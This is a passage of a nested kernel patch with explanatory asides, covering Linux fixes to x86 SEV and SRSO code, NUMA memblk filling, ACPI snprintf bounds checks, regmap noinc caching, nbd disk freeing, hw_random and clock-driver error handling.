+-copy_mc_to_user(void *to, const void *from, unsigned len);
++copy_mc_to_user(void __user *to, const void *from, unsigned len);
+ #endif
+ 
+ /*
+diff --git a/arch/x86/kernel/amd_nb.c b/arch/x86/kernel/amd_nb.c
+index 7e331e8f36929..8ea24df3c5ff1 100644
+--- a/arch/x86/kernel/amd_nb.c
++++ b/arch/x86/kernel/amd_nb.c
+@@ -100,6 +100,9 @@ static const struct pci_device_id amd_nb_link_ids[] = {
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M10H_DF_F4) },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M40H_DF_F4) },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M50H_DF_F4) },
++	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M60H_DF_F4) },
++	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M70H_DF_F4) },
++	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_19H_M78H_DF_F4) },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_CNB17H_F4) },
+ 	{}
+ };
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index 263df737d5cd5..13dffc43ded02 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -2477,7 +2477,7 @@ static void __init srso_select_mitigation(void)
+ 	pr_info("%s%s\n", srso_strings[srso_mitigation], (has_microcode ? "" : ", no microcode"));
+ 
+ pred_cmd:
+-	if ((boot_cpu_has(X86_FEATURE_SRSO_NO) || srso_cmd == SRSO_CMD_OFF) &&
++	if ((!boot_cpu_has_bug(X86_BUG_SRSO) || srso_cmd == SRSO_CMD_OFF) &&
+ 	     boot_cpu_has(X86_FEATURE_SBPB))
+ 		x86_pred_cmd = PRED_CMD_SBPB;
+ }
+diff --git a/arch/x86/kernel/head64.c b/arch/x86/kernel/head64.c
+index 6a3cfaf6b72ad..84adf12a76d3c 100644
+--- a/arch/x86/kernel/head64.c
++++ b/arch/x86/kernel/head64.c
+@@ -80,7 +80,7 @@ static struct desc_struct startup_gdt[GDT_ENTRIES] = {
+  * while the kernel still uses a direct mapping.
+  */
+ static struct desc_ptr startup_gdt_descr = {
+-	.size = sizeof(startup_gdt),
++	.size = sizeof(startup_gdt)-1,
+ 	.address = 0,
+ };
+ 
+diff --git a/arch/x86/kernel/sev.c b/arch/x86/kernel/sev.c
+index e7968c41ecf57..68b2a9d3dbc6b 100644
+--- a/arch/x86/kernel/sev.c
++++ b/arch/x86/kernel/sev.c
+@@ -22,6 +22,8 @@
+ #include <linux/efi.h>
+ #include <linux/platform_device.h>
+ #include <linux/io.h>
++#include <linux/psp-sev.h>
++#include <uapi/linux/sev-guest.h>
+ 
+ #include <asm/cpu_entry_area.h>
+ #include <asm/stacktrace.h>
+@@ -2205,7 +2207,7 @@ static int __init init_sev_config(char *str)
+ }
+ __setup("sev=", init_sev_config);
+ 
+-int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, unsigned long *fw_err)
++int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, struct snp_guest_request_ioctl *rio)
+ {
+ 	struct ghcb_state state;
+ 	struct es_em_ctxt ctxt;
+@@ -2213,8 +2215,7 @@ int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, unsigned
+ 	struct ghcb *ghcb;
+ 	int ret;
+ 
+-	if (!fw_err)
+-		return -EINVAL;
++	rio->exitinfo2 = SEV_RET_NO_FW_CALL;
+ 
+ 	/*
+ 	 * __sev_get_ghcb() needs to run with IRQs disabled because it is using
+@@ -2239,16 +2240,16 @@ int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, unsigned
+ 	if (ret)
+ 		goto e_put;
+ 
+-	*fw_err = ghcb->save.sw_exit_info_2;
+-	switch (*fw_err) {
++	rio->exitinfo2 = ghcb->save.sw_exit_info_2;
++	switch (rio->exitinfo2) {
+ 	case 0:
+ 		break;
+ 
+-	case SNP_GUEST_REQ_ERR_BUSY:
++	case SNP_GUEST_VMM_ERR(SNP_GUEST_VMM_ERR_BUSY):
+ 		ret = -EAGAIN;
+ 		break;
+ 
+-	case SNP_GUEST_REQ_INVALID_LEN:
++	case SNP_GUEST_VMM_ERR(SNP_GUEST_VMM_ERR_INVALID_LEN):
+ 		/* Number of expected pages are returned in RBX */
+ 		if (exit_code == SVM_VMGEXIT_EXT_GUEST_REQUEST) {
+ 			input->data_npages = ghcb_get_rbx(ghcb);
+diff --git a/arch/x86/lib/copy_mc.c b/arch/x86/lib/copy_mc.c
+index 80efd45a77617..6e8b7e600def5 100644
+--- a/arch/x86/lib/copy_mc.c
++++ b/arch/x86/lib/copy_mc.c
+@@ -70,23 +70,23 @@ unsigned long __must_check copy_mc_to_kernel(void *dst, const void *src, unsigne
+ }
+ EXPORT_SYMBOL_GPL(copy_mc_to_kernel);
+ 
+-unsigned long __must_check copy_mc_to_user(void *dst, const void *src, unsigned len)
++unsigned long __must_check copy_mc_to_user(void __user *dst, const void *src, unsigned len)
+ {
+ 	unsigned long ret;
+ 
+ 	if (copy_mc_fragile_enabled) {
+ 		__uaccess_begin();
+-		ret = copy_mc_fragile(dst, src, len);
++		ret = copy_mc_fragile((__force void *)dst, src, len);
+ 		__uaccess_end();
+ 		return ret;
+ 	}
+ 
+ 	if (static_cpu_has(X86_FEATURE_ERMS)) {
+ 		__uaccess_begin();
+-		ret = copy_mc_enhanced_fast_string(dst, src, len);
++		ret = copy_mc_enhanced_fast_string((__force void *)dst, src, len);
+ 		__uaccess_end();
+ 		return ret;
+ 	}
+ 
+-	return copy_user_generic(dst, src, len);
++	return copy_user_generic((__force void *)dst, src, len);
+ }
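The copy_mc.c hunk also tightens sparse annotations: dst is now void __user *,
and each (__force void *) cast marks the address-space conversion as
deliberate. A hedged one-function sketch of the pattern (sketch_copy is a
made-up name):

	static unsigned long sketch_copy(void __user *dst, const void *src,
					 unsigned len)
	{
		/* __force: the author asserts the cast is safe because the
		 * access runs inside __uaccess_begin()/__uaccess_end() */
		return copy_mc_fragile((__force void *)dst, src, len);
	}
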
+diff --git a/arch/x86/mm/maccess.c b/arch/x86/mm/maccess.c
+index 5a53c2cc169cc..6993f026adec9 100644
+--- a/arch/x86/mm/maccess.c
++++ b/arch/x86/mm/maccess.c
+@@ -9,12 +9,21 @@ bool copy_from_kernel_nofault_allowed(const void *unsafe_src, size_t size)
+ 	unsigned long vaddr = (unsigned long)unsafe_src;
+ 
+ 	/*
+-	 * Range covering the highest possible canonical userspace address
+-	 * as well as non-canonical address range. For the canonical range
+-	 * we also need to include the userspace guard page.
++	 * Do not allow userspace addresses.  This disallows
++	 * normal userspace and the userspace guard page:
+ 	 */
+-	return vaddr >= TASK_SIZE_MAX + PAGE_SIZE &&
+-	       __is_canonical_address(vaddr, boot_cpu_data.x86_virt_bits);
++	if (vaddr < TASK_SIZE_MAX + PAGE_SIZE)
++		return false;
++
++	/*
++	 * Allow everything during early boot before 'x86_virt_bits'
++	 * is initialized.  Needed for instruction decoding in early
++	 * exception handlers.
++	 */
++	if (!boot_cpu_data.x86_virt_bits)
++		return true;
++
++	return __is_canonical_address(vaddr, boot_cpu_data.x86_virt_bits);
+ }
+ #else
+ bool copy_from_kernel_nofault_allowed(const void *unsafe_src, size_t size)
+diff --git a/arch/x86/mm/numa.c b/arch/x86/mm/numa.c
+index 2aadb2019b4f2..c01c5506fd4ae 100644
+--- a/arch/x86/mm/numa.c
++++ b/arch/x86/mm/numa.c
+@@ -11,6 +11,7 @@
+ #include <linux/nodemask.h>
+ #include <linux/sched.h>
+ #include <linux/topology.h>
++#include <linux/sort.h>
+ 
+ #include <asm/e820/api.h>
+ #include <asm/proto.h>
+@@ -961,4 +962,83 @@ int memory_add_physaddr_to_nid(u64 start)
+ 	return nid;
+ }
+ EXPORT_SYMBOL_GPL(memory_add_physaddr_to_nid);
++
++static int __init cmp_memblk(const void *a, const void *b)
++{
++	const struct numa_memblk *ma = *(const struct numa_memblk **)a;
++	const struct numa_memblk *mb = *(const struct numa_memblk **)b;
++
++	return ma->start - mb->start;
++}
++
++static struct numa_memblk *numa_memblk_list[NR_NODE_MEMBLKS] __initdata;
++
++/**
++ * numa_fill_memblks - Fill gaps in numa_meminfo memblks
++ * @start: address to begin fill
++ * @end: address to end fill
++ *
++ * Find and extend numa_meminfo memblks to cover the @start-@end
++ * physical address range, such that the first memblk includes
++ * @start, the last memblk includes @end, and any gaps in between
++ * are filled.
++ *
++ * RETURNS:
++ * 0		  : Success
++ * NUMA_NO_MEMBLK : No memblk exists in @start-@end range
++ */
++
++int __init numa_fill_memblks(u64 start, u64 end)
++{
++	struct numa_memblk **blk = &numa_memblk_list[0];
++	struct numa_meminfo *mi = &numa_meminfo;
++	int count = 0;
++	u64 prev_end;
++
++	/*
++	 * Create a list of pointers to numa_meminfo memblks that
++	 * overlap start, end. Exclude (start == bi->end) since
++	 * end addresses in both a CFMWS range and a memblk range
++	 * are exclusive.
++	 *
++	 * This list of pointers is used to make in-place changes
++	 * that fill out the numa_meminfo memblks.
++	 */
++	for (int i = 0; i < mi->nr_blks; i++) {
++		struct numa_memblk *bi = &mi->blk[i];
++
++		if (start < bi->end && end >= bi->start) {
++			blk[count] = &mi->blk[i];
++			count++;
++		}
++	}
++	if (!count)
++		return NUMA_NO_MEMBLK;
++
++	/* Sort the list of pointers in memblk->start order */
++	sort(&blk[0], count, sizeof(blk[0]), cmp_memblk, NULL);
++
++	/* Make sure the first/last memblks include start/end */
++	blk[0]->start = min(blk[0]->start, start);
++	blk[count - 1]->end = max(blk[count - 1]->end, end);
++
++	/*
++	 * Fill any gaps by tracking the previous memblk's
++	 * end address and backfilling to it if needed.
++	 */
++	prev_end = blk[0]->end;
++	for (int i = 1; i < count; i++) {
++		struct numa_memblk *curr = blk[i];
++
++		if (prev_end >= curr->start) {
++			if (prev_end < curr->end)
++				prev_end = curr->end;
++		} else {
++			curr->start = prev_end;
++			prev_end = curr->end;
++		}
++	}
++	return 0;
++}
++
+ #endif
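A worked example of numa_fill_memblks() with hypothetical addresses: for a
window 0x100000000-0x300000000 covering memblks [0x120000000, 0x180000000)
and [0x200000000, 0x280000000), the first memblk is extended down to the
window start, the last up to the window end, and the interior gap is closed
by pulling the second memblk's start back to the previous end:

	/* before: [0x120000000, 0x180000000) [0x200000000, 0x280000000)
	 * after:  [0x100000000, 0x180000000) [0x180000000, 0x300000000) */
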
+diff --git a/block/blk-core.c b/block/blk-core.c
+index ebb7a1689b261..6eaf2b0ad7cca 100644
+--- a/block/blk-core.c
++++ b/block/blk-core.c
+@@ -490,8 +490,8 @@ static inline void bio_check_ro(struct bio *bio)
+ 	if (op_is_write(bio_op(bio)) && bdev_read_only(bio->bi_bdev)) {
+ 		if (op_is_flush(bio->bi_opf) && !bio_sectors(bio))
+ 			return;
+-		pr_warn("Trying to write to read-only block-device %pg\n",
+-			bio->bi_bdev);
++		pr_warn_ratelimited("Trying to write to read-only block-device %pg\n",
++				    bio->bi_bdev);
+ 		/* Older lvm-tools actually trigger this */
+ 	}
+ }
+diff --git a/drivers/acpi/device_sysfs.c b/drivers/acpi/device_sysfs.c
+index 120873dad2cc5..c727fb320eeea 100644
+--- a/drivers/acpi/device_sysfs.c
++++ b/drivers/acpi/device_sysfs.c
+@@ -158,8 +158,8 @@ static int create_pnp_modalias(struct acpi_device *acpi_dev, char *modalias,
+ 		return 0;
+ 
+ 	len = snprintf(modalias, size, "acpi:");
+-	if (len <= 0)
+-		return len;
++	if (len >= size)
++		return -ENOMEM;
+ 
+ 	size -= len;
+ 
+@@ -212,8 +212,10 @@ static int create_of_modalias(struct acpi_device *acpi_dev, char *modalias,
+ 	len = snprintf(modalias, size, "of:N%sT", (char *)buf.pointer);
+ 	ACPI_FREE(buf.pointer);
+ 
+-	if (len <= 0)
+-		return len;
++	if (len >= size)
++		return -ENOMEM;
++
++	size -= len;
+ 
+ 	of_compatible = acpi_dev->data.of_compatible;
+ 	if (of_compatible->type == ACPI_TYPE_PACKAGE) {
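The device_sysfs.c hunks rely on snprintf returning the length the full
string would have needed, so len >= size is the portable truncation test;
the old len <= 0 check could never fire for a non-empty format. A short
illustration with assumed values:

	char buf[8];
	int len = snprintf(buf, sizeof(buf), "acpi:%s", "LNXVIDEO");
	/* len == 13, the untruncated length; buf holds "acpi:LN" */
	if (len >= (int)sizeof(buf))
		return -ENOMEM;		/* output was truncated */
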
+diff --git a/drivers/acpi/numa/srat.c b/drivers/acpi/numa/srat.c
+index 1f4fc5f8a819d..12f330b0eac01 100644
+--- a/drivers/acpi/numa/srat.c
++++ b/drivers/acpi/numa/srat.c
+@@ -310,11 +310,16 @@ static int __init acpi_parse_cfmws(union acpi_subtable_headers *header,
+ 	start = cfmws->base_hpa;
+ 	end = cfmws->base_hpa + cfmws->window_size;
+ 
+-	/* Skip if the SRAT already described the NUMA details for this HPA */
+-	node = phys_to_target_node(start);
+-	if (node != NUMA_NO_NODE)
++	/*
++	 * The SRAT may have already described NUMA details for all,
++	 * or a portion of, this CFMWS HPA range. Extend the memblks
++	 * found for any portion of the window to cover the entire
++	 * window.
++	 */
++	if (!numa_fill_memblks(start, end))
+ 		return 0;
+ 
++	/* No SRAT description. Create a new node. */
+ 	node = acpi_map_pxm_to_node(*fake_pxm);
+ 
+ 	if (node == NUMA_NO_NODE) {
+diff --git a/drivers/acpi/property.c b/drivers/acpi/property.c
+index b8d9eb9a433ed..0565c18c2ee31 100644
+--- a/drivers/acpi/property.c
++++ b/drivers/acpi/property.c
+@@ -1114,25 +1114,26 @@ static int acpi_data_prop_read(const struct acpi_device_data *data,
+ 	switch (proptype) {
+ 	case DEV_PROP_STRING:
+ 		break;
+-	case DEV_PROP_U8 ... DEV_PROP_U64:
++	default:
+ 		if (obj->type == ACPI_TYPE_BUFFER) {
+ 			if (nval > obj->buffer.length)
+ 				return -EOVERFLOW;
+-			break;
++		} else {
++			if (nval > obj->package.count)
++				return -EOVERFLOW;
+ 		}
+-		fallthrough;
+-	default:
+-		if (nval > obj->package.count)
+-			return -EOVERFLOW;
+ 		break;
+ 	}
+ 	if (nval == 0)
+ 		return -EINVAL;
+ 
+-	if (obj->type != ACPI_TYPE_BUFFER)
+-		items = obj->package.elements;
+-	else
++	if (obj->type == ACPI_TYPE_BUFFER) {
++		if (proptype != DEV_PROP_U8)
++			return -EPROTO;
+ 		items = obj;
++	} else {
++		items = obj->package.elements;
++	}
+ 
+ 	switch (proptype) {
+ 	case DEV_PROP_U8:
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index 073d26ddb6c21..60b0128a10e86 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -130,6 +130,16 @@ static int video_detect_force_native(const struct dmi_system_id *d)
+ 	return 0;
+ }
+ 
++static int video_detect_portege_r100(const struct dmi_system_id *d)
++{
++	struct pci_dev *dev;
++	/* Search for Trident CyberBlade XP4m32 to confirm Portégé R100 */
++	dev = pci_get_device(PCI_VENDOR_ID_TRIDENT, 0x2100, NULL);
++	if (dev)
++		acpi_backlight_dmi = acpi_backlight_vendor;
++	return 0;
++}
++
+ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 	/*
+ 	 * Models which should use the vendor backlight interface,
+@@ -268,6 +278,22 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		},
+ 	},
+ 
++	/*
++	 * The Toshiba Portégé R100 has both acpi_video and the toshiba_acpi
++	 * vendor driver working, but neither gets activated because the VGA
++	 * adapter has no kernel driver (Trident CyberBlade XP4m32).
++	 * The DMI strings are generic, so check for the VGA chip in the callback.
++	 */
++	{
++	 .callback = video_detect_portege_r100,
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "TOSHIBA"),
++		DMI_MATCH(DMI_PRODUCT_NAME, "Portable PC"),
++		DMI_MATCH(DMI_PRODUCT_VERSION, "Version 1.0"),
++		DMI_MATCH(DMI_BOARD_NAME, "Portable PC")
++		},
++	},
++
+ 	/*
+ 	 * Models which need acpi_video backlight control where the GPU drivers
+ 	 * do not call acpi_video_register_backlight() because no internal panel
+diff --git a/drivers/base/regmap/regmap-debugfs.c b/drivers/base/regmap/regmap-debugfs.c
+index 817eda2075aa5..1e3d205ce15a0 100644
+--- a/drivers/base/regmap/regmap-debugfs.c
++++ b/drivers/base/regmap/regmap-debugfs.c
+@@ -48,7 +48,7 @@ static ssize_t regmap_name_read_file(struct file *file,
+ 		name = map->dev->driver->name;
+ 
+ 	ret = snprintf(buf, PAGE_SIZE, "%s\n", name);
+-	if (ret < 0) {
++	if (ret >= PAGE_SIZE) {
+ 		kfree(buf);
+ 		return ret;
+ 	}
+diff --git a/drivers/base/regmap/regmap.c b/drivers/base/regmap/regmap.c
+index df1f78abdf266..140af27f591ae 100644
+--- a/drivers/base/regmap/regmap.c
++++ b/drivers/base/regmap/regmap.c
+@@ -1702,17 +1702,19 @@ static int _regmap_raw_write_impl(struct regmap *map, unsigned int reg,
+ 	}
+ 
+ 	if (!map->cache_bypass && map->format.parse_val) {
+-		unsigned int ival;
++		unsigned int ival, offset;
+ 		int val_bytes = map->format.val_bytes;
+-		for (i = 0; i < val_len / val_bytes; i++) {
+-			ival = map->format.parse_val(val + (i * val_bytes));
+-			ret = regcache_write(map,
+-					     reg + regmap_get_offset(map, i),
+-					     ival);
++
++		/* Cache the last written value for noinc writes */
++		i = noinc ? val_len - val_bytes : 0;
++		for (; i < val_len; i += val_bytes) {
++			ival = map->format.parse_val(val + i);
++			offset = noinc ? 0 : regmap_get_offset(map, i / val_bytes);
++			ret = regcache_write(map, reg + offset, ival);
+ 			if (ret) {
+ 				dev_err(map->dev,
+ 					"Error in caching of register: %x ret: %d\n",
+-					reg + regmap_get_offset(map, i), ret);
++					reg + offset, ret);
+ 				return ret;
+ 			}
+ 		}
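The regmap hunk above handles noinc (non-incrementing) writes, where every
value in the buffer goes to the same bus address; only the final value is
the register's resulting state, so only it may enter the cache, at offset 0.
A comment-style trace of the loop under that reading:

	/* noinc write of 3 words {v0, v1, v2} to a FIFO register:
	 * i starts at val_len - val_bytes, so only v2 is parsed,
	 * offset is forced to 0, and the cache stores reg := v2 */
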
+diff --git a/drivers/block/nbd.c b/drivers/block/nbd.c
+index 7718c81e1dba8..e94d2ff6b1223 100644
+--- a/drivers/block/nbd.c
++++ b/drivers/block/nbd.c
+@@ -250,7 +250,6 @@ static void nbd_dev_remove(struct nbd_device *nbd)
+ 	struct gendisk *disk = nbd->disk;
+ 
+ 	del_gendisk(disk);
+-	put_disk(disk);
+ 	blk_mq_free_tag_set(&nbd->tag_set);
+ 
+ 	/*
+@@ -261,7 +260,7 @@ static void nbd_dev_remove(struct nbd_device *nbd)
+ 	idr_remove(&nbd_index_idr, nbd->index);
+ 	mutex_unlock(&nbd_index_mutex);
+ 	destroy_workqueue(nbd->recv_workq);
+-	kfree(nbd);
++	put_disk(disk);
+ }
+ 
+ static void nbd_dev_remove_work(struct work_struct *work)
+@@ -1608,6 +1607,13 @@ static void nbd_release(struct gendisk *disk, fmode_t mode)
+ 	nbd_put(nbd);
+ }
+ 
++static void nbd_free_disk(struct gendisk *disk)
++{
++	struct nbd_device *nbd = disk->private_data;
++
++	kfree(nbd);
++}
++
+ static const struct block_device_operations nbd_fops =
+ {
+ 	.owner =	THIS_MODULE,
+@@ -1615,6 +1621,7 @@ static const struct block_device_operations nbd_fops =
+ 	.release =	nbd_release,
+ 	.ioctl =	nbd_ioctl,
+ 	.compat_ioctl =	nbd_ioctl,
++	.free_disk =	nbd_free_disk,
+ };
+ 
+ #if IS_ENABLED(CONFIG_DEBUG_FS)
+diff --git a/drivers/char/hw_random/bcm2835-rng.c b/drivers/char/hw_random/bcm2835-rng.c
+index e98fcac578d66..634eab4776f32 100644
+--- a/drivers/char/hw_random/bcm2835-rng.c
++++ b/drivers/char/hw_random/bcm2835-rng.c
+@@ -71,7 +71,7 @@ static int bcm2835_rng_read(struct hwrng *rng, void *buf, size_t max,
+ 	while ((rng_readl(priv, RNG_STATUS) >> 24) == 0) {
+ 		if (!wait)
+ 			return 0;
+-		hwrng_msleep(rng, 1000);
++		hwrng_yield(rng);
+ 	}
+ 
+ 	num_words = rng_readl(priv, RNG_STATUS) >> 24;
+diff --git a/drivers/char/hw_random/core.c b/drivers/char/hw_random/core.c
+index cc002b0c2f0c3..8f31f9d810305 100644
+--- a/drivers/char/hw_random/core.c
++++ b/drivers/char/hw_random/core.c
+@@ -680,6 +680,12 @@ long hwrng_msleep(struct hwrng *rng, unsigned int msecs)
+ }
+ EXPORT_SYMBOL_GPL(hwrng_msleep);
+ 
++long hwrng_yield(struct hwrng *rng)
++{
++	return wait_for_completion_interruptible_timeout(&rng->dying, 1);
++}
++EXPORT_SYMBOL_GPL(hwrng_yield);
++
+ static int __init hwrng_modinit(void)
+ {
+ 	int ret;
+diff --git a/drivers/char/hw_random/geode-rng.c b/drivers/char/hw_random/geode-rng.c
+index 12fbe80918319..159baf00a8675 100644
+--- a/drivers/char/hw_random/geode-rng.c
++++ b/drivers/char/hw_random/geode-rng.c
+@@ -58,7 +58,8 @@ struct amd_geode_priv {
+ 
+ static int geode_rng_data_read(struct hwrng *rng, u32 *data)
+ {
+-	void __iomem *mem = (void __iomem *)rng->priv;
++	struct amd_geode_priv *priv = (struct amd_geode_priv *)rng->priv;
++	void __iomem *mem = priv->membase;
+ 
+ 	*data = readl(mem + GEODE_RNG_DATA_REG);
+ 
+@@ -67,7 +68,8 @@ static int geode_rng_data_read(struct hwrng *rng, u32 *data)
+ 
+ static int geode_rng_data_present(struct hwrng *rng, int wait)
+ {
+-	void __iomem *mem = (void __iomem *)rng->priv;
++	struct amd_geode_priv *priv = (struct amd_geode_priv *)rng->priv;
++	void __iomem *mem = priv->membase;
+ 	int data, i;
+ 
+ 	for (i = 0; i < 20; i++) {
+diff --git a/drivers/clk/clk-npcm7xx.c b/drivers/clk/clk-npcm7xx.c
+index e319cfa51a8a3..030186def9c69 100644
+--- a/drivers/clk/clk-npcm7xx.c
++++ b/drivers/clk/clk-npcm7xx.c
+@@ -510,7 +510,7 @@ static void __init npcm7xx_clk_init(struct device_node *clk_np)
+ 	return;
+ 
+ npcm7xx_init_fail:
+-	kfree(npcm7xx_clk_data->hws);
++	kfree(npcm7xx_clk_data);
+ npcm7xx_init_np_err:
+ 	iounmap(clk_base);
+ npcm7xx_init_error:
+diff --git a/drivers/clk/clk-scmi.c b/drivers/clk/clk-scmi.c
+index 2c7a830ce3080..fdec715c9ba9b 100644
+--- a/drivers/clk/clk-scmi.c
++++ b/drivers/clk/clk-scmi.c
+@@ -213,6 +213,7 @@ static int scmi_clocks_probe(struct scmi_device *sdev)
+ 		sclk->info = scmi_proto_clk_ops->info_get(ph, idx);
+ 		if (!sclk->info) {
+ 			dev_dbg(dev, "invalid clock info for idx %d\n", idx);
++			devm_kfree(dev, sclk);
+ 			continue;
+ 		}
+ 
+diff --git a/drivers/clk/imx/Kconfig b/drivers/clk/imx/Kconfig
+index 25785ec9c2762..f219004b8a337 100644
+--- a/drivers/clk/imx/Kconfig
++++ b/drivers/clk/imx/Kconfig
+@@ -96,6 +96,7 @@ config CLK_IMX8QXP
+ 	depends on (ARCH_MXC && ARM64) || COMPILE_TEST
+ 	depends on IMX_SCU && HAVE_ARM_SMCCC
+ 	select MXC_CLK_SCU
++	select MXC_CLK
+ 	help
+ 	  Build the driver for IMX8QXP SCU based clocks.
+ 
+diff --git a/drivers/clk/imx/clk-imx8mq.c b/drivers/clk/imx/clk-imx8mq.c
+index 882dcad4817d7..0a75814b3bc77 100644
+--- a/drivers/clk/imx/clk-imx8mq.c
++++ b/drivers/clk/imx/clk-imx8mq.c
+@@ -288,8 +288,7 @@ static int imx8mq_clocks_probe(struct platform_device *pdev)
+ 	void __iomem *base;
+ 	int err;
+ 
+-	clk_hw_data = kzalloc(struct_size(clk_hw_data, hws,
+-					  IMX8MQ_CLK_END), GFP_KERNEL);
++	clk_hw_data = devm_kzalloc(dev, struct_size(clk_hw_data, hws, IMX8MQ_CLK_END), GFP_KERNEL);
+ 	if (WARN_ON(!clk_hw_data))
+ 		return -ENOMEM;
+ 
+@@ -306,10 +305,12 @@ static int imx8mq_clocks_probe(struct platform_device *pdev)
+ 	hws[IMX8MQ_CLK_EXT4] = imx_obtain_fixed_clk_hw(np, "clk_ext4");
+ 
+ 	np = of_find_compatible_node(NULL, NULL, "fsl,imx8mq-anatop");
+-	base = of_iomap(np, 0);
++	base = devm_of_iomap(dev, np, 0, NULL);
+ 	of_node_put(np);
+-	if (WARN_ON(!base))
+-		return -ENOMEM;
++	if (WARN_ON(IS_ERR(base))) {
++		err = PTR_ERR(base);
++		goto unregister_hws;
++	}
+ 
+ 	hws[IMX8MQ_ARM_PLL_REF_SEL] = imx_clk_hw_mux("arm_pll_ref_sel", base + 0x28, 16, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
+ 	hws[IMX8MQ_GPU_PLL_REF_SEL] = imx_clk_hw_mux("gpu_pll_ref_sel", base + 0x18, 16, 2, pll_ref_sels, ARRAY_SIZE(pll_ref_sels));
+@@ -395,8 +396,10 @@ static int imx8mq_clocks_probe(struct platform_device *pdev)
+ 
+ 	np = dev->of_node;
+ 	base = devm_platform_ioremap_resource(pdev, 0);
+-	if (WARN_ON(IS_ERR(base)))
+-		return PTR_ERR(base);
++	if (WARN_ON(IS_ERR(base))) {
++		err = PTR_ERR(base);
++		goto unregister_hws;
++	}
+ 
+ 	/* CORE */
+ 	hws[IMX8MQ_CLK_A53_DIV] = imx8m_clk_hw_composite_core("arm_a53_div", imx8mq_a53_sels, base + 0x8000);
+diff --git a/drivers/clk/imx/clk-imx8qxp.c b/drivers/clk/imx/clk-imx8qxp.c
+index 546a3703bfeb2..273de1f293076 100644
+--- a/drivers/clk/imx/clk-imx8qxp.c
++++ b/drivers/clk/imx/clk-imx8qxp.c
+@@ -148,10 +148,10 @@ static int imx8qxp_clk_probe(struct platform_device *pdev)
+ 	imx_clk_scu("adc0_clk",  IMX_SC_R_ADC_0, IMX_SC_PM_CLK_PER);
+ 	imx_clk_scu("adc1_clk",  IMX_SC_R_ADC_1, IMX_SC_PM_CLK_PER);
+ 	imx_clk_scu("pwm_clk",   IMX_SC_R_LCD_0_PWM_0, IMX_SC_PM_CLK_PER);
++	imx_clk_scu("elcdif_pll", IMX_SC_R_ELCDIF_PLL, IMX_SC_PM_CLK_PLL);
+ 	imx_clk_scu2("lcd_clk", lcd_sels, ARRAY_SIZE(lcd_sels), IMX_SC_R_LCD_0, IMX_SC_PM_CLK_PER);
+ 	imx_clk_scu2("lcd_pxl_clk", lcd_pxl_sels, ARRAY_SIZE(lcd_pxl_sels), IMX_SC_R_LCD_0, IMX_SC_PM_CLK_MISC0);
+ 	imx_clk_scu("lcd_pxl_bypass_div_clk", IMX_SC_R_LCD_0, IMX_SC_PM_CLK_BYPASS);
+-	imx_clk_scu("elcdif_pll", IMX_SC_R_ELCDIF_PLL, IMX_SC_PM_CLK_PLL);
+ 
+ 	/* Audio SS */
+ 	imx_clk_scu("audio_pll0_clk", IMX_SC_R_AUDIO_PLL_0, IMX_SC_PM_CLK_PLL);
+diff --git a/drivers/clk/keystone/pll.c b/drivers/clk/keystone/pll.c
+index ee5c72369334f..6bbdd4705d71f 100644
+--- a/drivers/clk/keystone/pll.c
++++ b/drivers/clk/keystone/pll.c
+@@ -281,12 +281,13 @@ static void __init of_pll_div_clk_init(struct device_node *node)
+ 
+ 	clk = clk_register_divider(NULL, clk_name, parent_name, 0, reg, shift,
+ 				 mask, 0, NULL);
+-	if (clk) {
+-		of_clk_add_provider(node, of_clk_src_simple_get, clk);
+-	} else {
++	if (IS_ERR(clk)) {
+ 		pr_err("%s: error registering divider %s\n", __func__, clk_name);
+ 		iounmap(reg);
++		return;
+ 	}
++
++	of_clk_add_provider(node, of_clk_src_simple_get, clk);
+ }
+ CLK_OF_DECLARE(pll_divider_clock, "ti,keystone,pll-divider-clock", of_pll_div_clk_init);
+ 
+@@ -328,10 +329,12 @@ static void __init of_pll_mux_clk_init(struct device_node *node)
+ 	clk = clk_register_mux(NULL, clk_name, (const char **)&parents,
+ 				ARRAY_SIZE(parents) , 0, reg, shift, mask,
+ 				0, NULL);
+-	if (clk)
+-		of_clk_add_provider(node, of_clk_src_simple_get, clk);
+-	else
++	if (IS_ERR(clk)) {
+ 		pr_err("%s: error registering mux %s\n", __func__, clk_name);
++		return;
++	}
++
++	of_clk_add_provider(node, of_clk_src_simple_get, clk);
+ }
+ CLK_OF_DECLARE(pll_mux_clock, "ti,keystone,pll-mux-clock", of_pll_mux_clk_init);
+ 
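
Both keystone hunks fix the same inverted test: clk_register_divider() and clk_register_mux() report failure with an ERR_PTR-encoded error, never NULL, so the old "if (clk)" branch was taken even on failure and the error path was dead. The convention, sketched:

	struct clk *clk;

	clk = clk_register_divider(NULL, clk_name, parent_name, 0, reg,
				   shift, mask, 0, NULL);
	if (IS_ERR(clk)) {		/* e.g. ERR_PTR(-ENOMEM) */
		pr_err("%s: error registering divider %s\n",
		       __func__, clk_name);
		iounmap(reg);
		return;
	}
	of_clk_add_provider(node, of_clk_src_simple_get, clk);
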
+diff --git a/drivers/clk/mediatek/clk-mt2701.c b/drivers/clk/mediatek/clk-mt2701.c
+index 1c3a93143dc5e..00d2e81bdd43e 100644
+--- a/drivers/clk/mediatek/clk-mt2701.c
